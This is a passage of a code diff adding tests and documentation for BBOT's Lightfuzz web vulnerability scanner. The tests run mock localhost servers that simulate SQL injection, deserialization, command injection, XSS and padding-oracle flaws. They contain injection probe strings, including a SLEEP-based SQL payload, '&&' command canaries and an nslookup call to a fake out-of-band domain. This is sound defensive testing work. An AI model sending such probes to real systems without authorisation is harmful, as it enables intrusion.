+ """ + if value.endswith("'"): + if value.endswith("''"): + return Response(sql_block_normal, status=200) + return Response(sql_block_error, status=500) + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [search] Parameter Type: [POSTPARAM] Detection Method: [Single Quote/Two Single Quote]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqli_finding_emitted, "SQLi Single/Double Quote postparam FINDING not emitted" + + +# disable_post test +class Test_Lightfuzz_disable_post(Test_Lightfuzz_sqli_post): + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + "disable_post": True, + } + }, + } + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [search] Parameter Type: [POSTPARAM] Detection Method: [Single Quote/Two Single Quote]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert not sqli_finding_emitted, "post-based SQLI emitted despite post-parameters being disabled" + + +# SQLI Single Quote/Two Single Quote (headers) +class Test_Lightfuzz_sqli_headers(Test_Lightfuzz_sqli): + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + seed_events = [] + parent_event = module_test.scan.make_event( + "http://127.0.0.1:8888/", + "URL", + module_test.scan.root_event, + module="httpx", + tags=["status-200", "distance-0"], + ) + + data = { + "host": "127.0.0.1", + "type": "HEADER", + "name": "test", + "original_value": None, + "url": "http://127.0.0.1:8888", + "description": "Test Dummy Header", + } + seed_event = module_test.scan.make_event(data, "WEB_PARAMETER", parent_event, tags=["distance-0"]) + seed_events.append(seed_event) + module_test.scan.target.seeds.events = set(seed_events) + + def request_handler(self, request): + placeholder_block = """ + +

placeholder

+ + """ + + if request.headers.get("Test") is not None: + header_value = request.headers.get("Test") + + header_block_normal = f""" + +

placeholder

+

test: {header_value}

+ + """ + header_block_error = """ + +

placeholder

+

Error!

+ + """ + if header_value.endswith("'") and not header_value.endswith("''"): + return Response(header_block_error, status=500) + return Response(header_block_normal, status=200) + return Response(placeholder_block, status=200) + + def check(self, module_test, events): + sqli_finding_emitted = False + for e in events: + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [test] Parameter Type: [HEADER] Detection Method: [Single Quote/Two Single Quote]" + in e.data["description"] + ): + sqli_finding_emitted = True + assert sqli_finding_emitted, "SQLi Single/Double Quote headers FINDING not emitted" + + +# SQLI Single Quote/Two Single Quote (cookies) +class Test_Lightfuzz_sqli_cookies(Test_Lightfuzz_sqli): + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + seed_events = [] + parent_event = module_test.scan.make_event( + "http://127.0.0.1:8888/", + "URL", + module_test.scan.root_event, + module="httpx", + tags=["status-200", "distance-0"], + ) + + data = { + "host": "127.0.0.1", + "type": "COOKIE", + "name": "test", + "original_value": None, + "url": "http://127.0.0.1:8888", + "description": "Test Dummy Header", + } + seed_event = module_test.scan.make_event(data, "WEB_PARAMETER", parent_event, tags=["distance-0"]) + seed_events.append(seed_event) + module_test.scan.target.seeds.events = set(seed_events) + + def request_handler(self, request): + placeholder_block = """ + +

placeholder

+ + """ + + if request.cookies.get("test") is not None: + header_value = request.cookies.get("test") + + header_block_normal = f""" + +

placeholder

+

test: {header_value}

+ + """ + + header_block_error = """ + +

placeholder

+

Error!

+ + """ + if header_value.endswith("'") and not header_value.endswith("''"): + return Response(header_block_error, status=500) + return Response(header_block_normal, status=200) + return Response(placeholder_block, status=200) + + def check(self, module_test, events): + sqli_finding_emitted = False + for e in events: + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [test] Parameter Type: [COOKIE] Detection Method: [Single Quote/Two Single Quote]" + in e.data["description"] + ): + sqli_finding_emitted = True + assert sqli_finding_emitted, "SQLi Single/Double Quote cookies FINDING not emitted" + + +# SQLi Delay Probe +class Test_Lightfuzz_sqli_delay(Test_Lightfuzz_sqli): + def request_handler(self, request): + from time import sleep + + qs = str(request.query_string.decode()) + + parameter_block = """ + + + """ + if "search=" in qs: + value = qs.split("=")[1] + + if "&" in value: + value = value.split("&")[0] + + sql_block = """ +
+

0 search results found

+
+
+ """ + if "'%20AND%20(SLEEP(5))%20AND%20" in value: + sleep(5) + + return Response(sql_block, status=200) + return Response(parameter_block, status=200) + + def check(self, module_test, events): + web_parameter_emitted = False + sqldelay_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible Blind SQL Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [Delay Probe (1' AND (SLEEP(5)) AND ')]" + in e.data["description"] + ): + sqldelay_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqldelay_finding_emitted, "SQLi Delay FINDING not emitted" + + +# Serialization Module (Error Resolution) +class Test_Lightfuzz_serial_errorresolution(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["serial"], + } + }, + } + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def request_handler(self, request): + dotnet_serial_error = """ + + Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. + +

+ + Exception Details: System.Runtime.Serialization.SerializationException: End of Stream encountered before parsing was completed.

+ + """ + + dotnet_serial_error_resolved = ( + "Deserialization successful! Object type: System.String" + ) + + dotnet_serial_html = """ + + + + Deserialization RCE Example + + +
+
+ +
+ +
+ + + +
+
+

Deserialization Test

+ Enter serialized data:
+

+

+
+
+ + + + + """ + + post_params = request.form + + if "TextBox1" not in post_params.keys(): + return Response(dotnet_serial_html, status=200) + + else: + if post_params["__VIEWSTATE"] != "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP": + return Response(dotnet_serial_error, status=500) + if post_params["TextBox1"] == "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==": + return Response(dotnet_serial_error_resolved, status=200) + else: + return Response(dotnet_serial_error, status=500) + + def check(self, module_test, events): + excavate_extracted_form_parameter = False + excavate_extracted_form_parameter_details = False + lightfuzz_serial_detect_errorresolution = False + + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["name"] == "TextBox1": + excavate_extracted_form_parameter = True + if ( + e.data["url"] == "http://127.0.0.1:8888/deser.aspx" + and e.data["host"] == "127.0.0.1" + and e.data["additional_params"] + == { + "__VIEWSTATE": "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP", + "__VIEWSTATEGENERATOR": "AD6F025C", + "__EVENTVALIDATION": "/wEdAANdCjkiIFhjCB8ta8aO/EhuESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3czZjft8VgObR/WUivai7w4kfR1wg==", + "Button1": "Submit", + } + ): + excavate_extracted_form_parameter_details = True + if e.type == "FINDING": + if ( + e.data["description"] + == "POSSIBLE Unsafe Deserialization. Parameter: [TextBox1] Parameter Type: [POSTPARAM] Technique: [Error Resolution] Serialization Payload: [dotnet_base64]" + ): + lightfuzz_serial_detect_errorresolution = True + + assert excavate_extracted_form_parameter, "WEB_PARAMETER for POST form was not emitted" + assert excavate_extracted_form_parameter_details, "WEB_PARAMETER for POST form did not have correct data" + assert ( + lightfuzz_serial_detect_errorresolution + ), "Lightfuzz Serial module failed to detect ASP.NET error resolution based deserialization" + + +# Serialization Module (Error Differential) +class Test_Lightfuzz_serial_errordifferential(Test_Lightfuzz_serial_errorresolution): + def request_handler(self, request): + java_serial_error = """ + +

Internal Server Error

+

java.io.StreamCorruptedException: invalid stream header: 0C400304

+ + """ + + java_serial_error_keyword = """ + +

Internal Server Error

+

java.lang.ClassCastException: Cannot cast java.lang.String to lab.actions.common.serializable.AccessTokenUser

+ + """ + + java_serial_html = """ + + + + Deserialization RCE Example + + + Please log in to continue. + + + """ + + cookies = request.cookies + + if "session" not in cookies.keys(): + response = Response(java_serial_html, status=200) + response.set_cookie("session", value="", max_age=3600, httponly=True) + return response + + else: + if cookies["session"] == "rO0ABXQABHRlc3Q=": + return Response(java_serial_error_keyword, status=500) + else: + return Response(java_serial_error, status=500) + + def check(self, module_test, events): + excavate_extracted_cookie_parameter = False + lightfuzz_serial_detect_errordifferential = False + + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["description"] == "Set-Cookie Assigned Cookie [session]" and e.data["type"] == "COOKIE": + excavate_extracted_cookie_parameter = True + + if e.type == "FINDING": + if ( + e.data["description"] + == "POSSIBLE Unsafe Deserialization. Parameter: [session] Parameter Type: [COOKIE] Technique: [Differential Error Analysis] Error-String: [cannot cast java.lang.string] Payload: [java_base64_string_error]" + ): + lightfuzz_serial_detect_errordifferential = True + + assert excavate_extracted_cookie_parameter, "WEB_PARAMETER for cookie was not emitted" + assert ( + lightfuzz_serial_detect_errordifferential + ), "Lightfuzz Serial module failed to detect Java error differential based deserialization" + + +# CMDi echo canary +class Test_Lightfuzz_cmdi(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["cmdi"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ + + """ + if "search=" in qs: + value = qs.split("=")[1] + + if "&" in value: + value = value.split("&")[0] + + if "%26%26%20echo%20" in value: + cmdi_value = value.split("%26%26%20echo%20")[1].split("%20")[0] + else: + cmdi_value = value + cmdi_block = f""" +
+

0 search results for '{unquote(cmdi_value)}'

+
+
+ """ + return Response(cmdi_block, status=200) + + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + cmdi_echocanary_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "POSSIBLE OS Command Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [echo canary] CMD Probe Delimeters: [&&]" + in e.data["description"] + ): + cmdi_echocanary_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert cmdi_echocanary_finding_emitted, "echo canary CMDi FINDING not emitted" + + +# CMDi interactsh +class Test_Lightfuzz_cmdi_interactsh(Test_Lightfuzz_cmdi): + @staticmethod + def extract_subdomain_tag(data): + pattern = r"search=.+%26%26%20nslookup%20(.+)\.fakedomain\.fakeinteractsh.com%20%26%26" + match = re.search(pattern, data) + if match: + return match.group(1) + + config_overrides = { + "interactsh_disable": False, + "modules": { + "lightfuzz": { + "enabled_submodules": ["cmdi"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ + + """ + + if "search=" in qs: + subdomain_tag = None + subdomain_tag = self.extract_subdomain_tag(request.full_path) + + if subdomain_tag: + self.interactsh_mock_instance.mock_interaction(subdomain_tag) + return Response(parameter_block, status=200) + + async def setup_before_prep(self, module_test): + self.interactsh_mock_instance = module_test.mock_interactsh("lightfuzz") + + module_test.monkeypatch.setattr( + module_test.scan.helpers, "interactsh", lambda *args, **kwargs: self.interactsh_mock_instance + ) + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + cmdi_interacttsh_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "VULNERABILITY": + if ( + "OS Command Injection (OOB Interaction) Type: [GETPARAM] Parameter Name: [search] Probe: [&&]" + in e.data["description"] + ): + cmdi_interacttsh_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert cmdi_interacttsh_finding_emitted, "interactsh CMDi FINDING not emitted" + + +class Test_Lightfuzz_speculative(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "paramminer_getparams", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["xss"]}, + "paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}, + }, + } + + def request_handler(self, request): + + qs = str(request.query_string.decode()) + parameter_block = """ + { + "search": 1, + "common": 1 + } + """ + if "search=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + xss_block = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + return Response(xss_block, status=200) + return Response(parameter_block, status=200, headers={"Content-Type": "application/json"}) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + excavate_json_extraction = False + xss_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter (speculative from json content) [search]" in e.data["description"]: + excavate_json_extraction = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [search] Context: [Between Tags" in e.data["description"]: + xss_finding_emitted = True + + assert excavate_json_extraction, "Excavate failed to extract json parameter" + assert xss_finding_emitted, "Between Tags XSS FINDING not emitted" + + +class Test_Lightfuzz_crypto_error(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["crypto"]}, + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + + parameter_block = """ +
+
+ + +
+
+ """ + crypto_block = """ +
+

Access Denied!

+
+
+ """ + if "secret=" in qs: + value = qs.split("=")[1] + if value: + return Response(crypto_block, status=200) + + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + cryptoerror_parameter_extracted = False + cryptoerror_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [secret] (GET Form Submodule)" in e.data["description"]: + cryptoerror_parameter_extracted = True + if e.type == "FINDING": + if ( + "Possible Cryptographic Error. Parameter: [secret] Parameter Type: [GETPARAM] Original Value: [08a5a2cea9c5a5576e6e5314edcba581d21c7111c9c0c06990327b9127058d67]" + in e.data["description"] + ): + cryptoerror_finding_emitted = True + assert cryptoerror_parameter_extracted, "Parameter not extracted" + assert cryptoerror_finding_emitted, "Crypto Error Message FINDING not emitted" + + +class Test_Lightfuzz_crypto_error_falsepositive(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["crypto"]}, + }, + } + + def request_handler(self, request): + fp_block = """ +
+
+ + +
+

Access Denied!

+
+ """ + return Response(fp_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + cryptoerror_parameter_extracted = False + cryptoerror_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [secret] (GET Form Submodule)" in e.data["description"]: + cryptoerror_parameter_extracted = True + if e.type == "FINDING": + if "Possible Cryptographic Error" in e.data["description"]: + cryptoerror_finding_emitted = True + assert cryptoerror_parameter_extracted, "Parameter not extracted" + assert ( + not cryptoerror_finding_emitted + ), "Crypto Error Message FINDING was emitted (it is an intentional false positive)" + + +class Test_PaddingOracleDetection(ModuleTestBase): + + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "excavate", "lightfuzz"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["crypto"], + } + }, + } + + def request_handler(self, request): + encrypted_value = quote( + "dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q+4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg==" + ) + default_html_response = f""" + + +
+ + +
+ + + """ + + if "/decrypt" in request.url and request.method == "POST": + if request.form and request.form["encrypted_data"]: + encrypted_data = request.form["encrypted_data"] + if "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALwAgLKWJi2nWKbh9ag5rnhm" in encrypted_data: + response_content = "Padding error detected" + elif "4GXVGZbo0DTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg" in encrypted_data: + response_content = "DIFFERENT CRYPTOGRAPHIC ERROR" + elif "AAAAAAA" in encrypted_data: + response_content = "YET DIFFERENT CRYPTOGRAPHIC ERROR" + else: + response_content = "Decryption failed" + + return Response(response_content, status=200) + else: + return Response(default_html_response, status=200) + + async def setup_after_prep(self, module_test): + module_test.set_expect_requests_handler(expect_args=re.compile(".*"), request_handler=self.request_handler) + + def check(self, module_test, events): + for e in events: + print(f"{e.type}: {e.data}") + + web_parameter_extracted = False + cryptographic_parameter_finding = False + padding_oracle_detected = False + for e in events: + + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [encrypted_data] (POST Form" in e.data["description"]: + web_parameter_extracted = True + if e.type == "FINDING": + if ( + e.data["description"] + == "Probable Cryptographic Parameter. Parameter: [encrypted_data] Parameter Type: [POSTPARAM] Original Value: [dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q%2B4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg%3D%3D] Detection Technique(s): [Single-byte Mutation, Data Truncation] Envelopes: [URL-Encoded]" + ): + cryptographic_parameter_finding = True + + if e.type == "VULNERABILITY": + if ( + e.data["description"] + == "Padding Oracle Vulnerability. Block size: [16] Parameter: [encrypted_data] Parameter Type: [POSTPARAM] Original Value: [dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q%2B4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg%3D%3D] Envelopes: [URL-Encoded]" + ): + padding_oracle_detected = True + + assert web_parameter_extracted, "Web parameter was not extracted" + assert cryptographic_parameter_finding, "Cryptographic parameter not detected" + assert padding_oracle_detected, "Padding oracle vulnerability was not detected" diff --git a/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py b/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py new file mode 100644 index 0000000000..90e88ee7b6 --- /dev/null +++ b/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py @@ -0,0 +1,46 @@ +from .base import ModuleTestBase +from werkzeug.wrappers import Response +import re + +from .test_module_paramminer_getparams import TestParamminer_Getparams + + +class TestReflected_parameters_fromexcavate(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "reflected_parameters", "excavate"] + + def request_handler(self, request): + normal_block = 'foo' + qs = str(request.query_string.decode()) + if "reflected=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + reflected_block = f'' + return Response(reflected_block, status=200) + else: + return Response(normal_block, status=200) + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and e.data["description"] + == "GET Parameter value reflected in response body. Name: [reflected] Source Module: [excavate] Original Value: [foo]" + for e in events + ) + + +class TestReflected_parameters_fromparamminer(TestParamminer_Getparams): + modules_overrides = ["httpx", "paramminer_getparams", "reflected_parameters"] + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and "GET Parameter value reflected in response body. Name: [id] Source Module: [paramminer_getparams]" + in e.data["description"] + for e in events + ) diff --git a/docs/modules/lightfuzz.md b/docs/modules/lightfuzz.md new file mode 100644 index 0000000000..35b0e4987f --- /dev/null +++ b/docs/modules/lightfuzz.md @@ -0,0 +1,105 @@ +# Lightfuzz + +## Philosophy + +### What is Lightfuzz? + +Lightfuzz is a lightweight web vulnerability scanner built into BBOT. It is designed to find "low-hanging fruit" type vulnerabilities without much overhead and at massive scale. + +### What is Lightfuzz NOT? + +Lightfuzz is not, does not attempt to be, and will never be, a replacement for a full-blown web application scanner. You should not, for example, be running Lightfuzz as a replacement for Burp Suite scanning. Burp Suite scanner will always find more (even though we can find a few things it can't). + +It will also not help you *exploit* vulnerabilities. It's job is to point out vulnerabilities, or likely vulnerabilities, or potential vulnerabilities, and then pass them off to you. A great deal of the overhead with traditional scanners comes in the confirmation phase, or in testing exploitation payloads. + +So for example, Lightfuzz may detect an XSS vulnerability for you. But its NOT going to help you figure out which tag you need to use to get around a security filter, or give you any kind of a final payload. It's simply going to tell you that the contents of a given GET parameter are being reflected and that it was able to render an unmodified HTML tag. The rest is up to you. + +### False Positives + +Significant work has gone into minimizing false positives. However, due to the nature of how Lightfuzz works, they are a reality. Random hiccups in network connectivity can cause them in some cases, odd WAF behavior can account for others. + +If you see a false positive that you feel is occuring too often or could easily be prevented, please open a GitHub issue and we will take a look! + +## Modules + +Lightfuzz is divided into numerous "submodules". These would typically be ran all together, but they can be configured to be run individually or in any desired configuration. This would be done with the aide of a `preset`, more on those in a moment. + +### `cmdi` (Command Injection) + - Finds output-based on blind out-of-band (via `Interactsh`) command injections +### `crypto` (Cryptography) + - Identifies cryptographic parameters that have a tangable effect on the application + - Can identify padding oracle vulnerabilities + - Can identify hash length extention vulnerabilities +### `path` (Path Traversal) + - Can find arbitrary file read / local-file include vulnerabilities, based on relative path traversal or with absolute paths +### `serial` (Deserialization) + - Can identify the active deserialization of a variety of deserialization types across several platforms +### `sqli` (SQL Injection) + - Error Based SQLi Detection + - Blind time-delay SQLi Detection +### `ssti` (Server-side Template Injection) + - Can find basic server-side template injection +### `xss` (Cross-site Scripting) + - Can find a variety of XSS types, across several different contexts (between-tags, attribute, Javascript-based) +## Presets + +Lightfuzz comes with a few pre-defined presets. The first thing to know is that, unless you really know BBOT inside and out, we recommend using one of them. This because to be successful, Lightfuzz needs to change a lot of very important BBOT settings. These include: + +* Turning the web spider on, and setting a reasonable web spider distance and depth. +``` + web: + spider_distance: 3 + spider_depth: 4 +``` + +* Setting `url_querystring_remove` to False. By default, BBOT strips away querystings, so in order to FUZZ GET parameters, that default has to be disabled. +``` +url_querystring_remove: False +``` +* Setting the `excavate` internal module to retain querystrings when it finds new URLs +``` + excavate: + retain_querystring: True +``` +* Enabling several other complimentary modules. Specifically, `hunt` and `reflected_parameters` can be useful companion modules that also be useful when `WEB_PARAMETER` events are being emitted. + +If you don't want to dive into those details, and we don't blame you, here are the built-in preset options and what you need to know about the differences. + +# -p lightfuzz + +This is the default setting, and it enables all submodules. It changes all of the essential BBOT settings to make Lightfuzz work, without too many extras. However it is important to note that it **DISABLES FUZZING POST REQUESTS**. This is because this type of request is the most intrusive, and the most likely to cause problems, especially if it's ran against an internal network. + +# -p lightfuzz-intense + +* Increases the web spider settings a bit from the default. +* Adds in the **Param Miner** suite of modules to try and find new parameters to fuzz via brute-force +* Enables fuzzing of POST parameters + +# -p lightfuzz-max + +Everything included in `lightfuzz-intense`, plus: + +* Query string collapsing turned OFF. Normally, multiple instances of the same parameter (e.g., foo=bar and foo=bar2) are collapsed into one for fuzzing. With `lightfuzz-max`, each instance is fuzzed individually. +* Force common headers enabled - Fuzz certain common header parameters, even if we didn't discover them + +These settings aren't typically desired as they add significant time to the scan. + +# -p lightfuzz-xss + +This is a special Lightfuzz preset that focuses entirely on XSS, to make XSS hunting as fast as possible. It is an example of how to make a preset that focuses on specific submodules. It also includes the `paramminer-getparams` module to help find undocumented parameters to fuzz. + +# Usage + +With the presets in mind, usage is incredibly simple. In most cases you will just do the following: + +``` +bbot -p lightfuzz -t targets.txt +``` + +It's really that simple. Almost all output from Lightfuzz will be in the form of a `FINDING`, as opposed to a `VULNERABILITY`, with a couple of exceptions. This is because, as was explained, the nature of the findings are that they are typically unconfirmed and will require work on your part to do so. + +If you wanted a specific submodule: + +``` +bbot -p lightfuzz -t targets.txt -c modules.lightfuzz.enabled_submodules[xss] +``` \ No newline at end of file diff --git a/poetry.lock b/poetry.lock index 9dc7f17d5e..6a5f69cc91 100644 --- a/poetry.lock +++ b/poetry.lock @@ -1654,32 +1654,32 @@ virtualenv = ">=20.10.0" [[package]] name = "psutil" -version = "6.1.0" +version = "6.1.1" description = "Cross-platform lib for process and system monitoring in Python." optional = false python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,>=2.7" files = [ - {file = "psutil-6.1.0-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:ff34df86226c0227c52f38b919213157588a678d049688eded74c76c8ba4a5d0"}, - {file = "psutil-6.1.0-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:c0e0c00aa18ca2d3b2b991643b799a15fc8f0563d2ebb6040f64ce8dc027b942"}, - {file = "psutil-6.1.0-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:000d1d1ebd634b4efb383f4034437384e44a6d455260aaee2eca1e9c1b55f047"}, - {file = "psutil-6.1.0-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:5cd2bcdc75b452ba2e10f0e8ecc0b57b827dd5d7aaffbc6821b2a9a242823a76"}, - {file = "psutil-6.1.0-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:045f00a43c737f960d273a83973b2511430d61f283a44c96bf13a6e829ba8fdc"}, - {file = "psutil-6.1.0-cp27-none-win32.whl", hash = "sha256:9118f27452b70bb1d9ab3198c1f626c2499384935aaf55388211ad982611407e"}, - {file = "psutil-6.1.0-cp27-none-win_amd64.whl", hash = "sha256:a8506f6119cff7015678e2bce904a4da21025cc70ad283a53b099e7620061d85"}, - {file = "psutil-6.1.0-cp36-abi3-macosx_10_9_x86_64.whl", hash = "sha256:6e2dcd475ce8b80522e51d923d10c7871e45f20918e027ab682f94f1c6351688"}, - {file = "psutil-6.1.0-cp36-abi3-macosx_11_0_arm64.whl", hash = "sha256:0895b8414afafc526712c498bd9de2b063deaac4021a3b3c34566283464aff8e"}, - {file = "psutil-6.1.0-cp36-abi3-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9dcbfce5d89f1d1f2546a2090f4fcf87c7f669d1d90aacb7d7582addece9fb38"}, - {file = "psutil-6.1.0-cp36-abi3-manylinux_2_12_x86_64.manylinux2010_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:498c6979f9c6637ebc3a73b3f87f9eb1ec24e1ce53a7c5173b8508981614a90b"}, - {file = "psutil-6.1.0-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d905186d647b16755a800e7263d43df08b790d709d575105d419f8b6ef65423a"}, - {file = "psutil-6.1.0-cp36-cp36m-win32.whl", hash = "sha256:6d3fbbc8d23fcdcb500d2c9f94e07b1342df8ed71b948a2649b5cb060a7c94ca"}, - {file = "psutil-6.1.0-cp36-cp36m-win_amd64.whl", hash = "sha256:1209036fbd0421afde505a4879dee3b2fd7b1e14fee81c0069807adcbbcca747"}, - {file = "psutil-6.1.0-cp37-abi3-win32.whl", hash = "sha256:1ad45a1f5d0b608253b11508f80940985d1d0c8f6111b5cb637533a0e6ddc13e"}, - {file = "psutil-6.1.0-cp37-abi3-win_amd64.whl", hash = "sha256:a8fb3752b491d246034fa4d279ff076501588ce8cbcdbb62c32fd7a377d996be"}, - {file = "psutil-6.1.0.tar.gz", hash = "sha256:353815f59a7f64cdaca1c0307ee13558a0512f6db064e92fe833784f08539c7a"}, + {file = "psutil-6.1.1-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:9ccc4316f24409159897799b83004cb1e24f9819b0dcf9c0b68bdcb6cefee6a8"}, + {file = "psutil-6.1.1-cp27-cp27m-manylinux2010_i686.whl", hash 